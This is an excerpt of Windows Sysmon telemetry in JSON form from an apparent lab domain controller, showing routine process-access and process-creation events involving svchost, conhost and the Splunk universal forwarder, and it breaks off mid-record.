{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.161\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AD-5F25-0000-0010A7FA0A00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.161","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AD-5F25-0000-0010A7FA0A00}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.301\r\nSourceProcessGUID: {A837DB8D-03AD-5F25-0000-0010A7FA0A00}\r\nSourceProcessId: 4852\r\nSourceThreadId: 3984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.301","SourceProcessGUID":"{A837DB8D-03AD-5F25-0000-0010A7FA0A00}","SourceProcessId":"4852","SourceThreadId":"3984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nProcessGuid: {A837DB8D-03AD-5F25-0000-00106BFC0A00}\r\nProcessId: 2820\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","ProcessGuid":"{A837DB8D-03AD-5F25-0000-00106BFC0A00}","Image":"C:\\Program 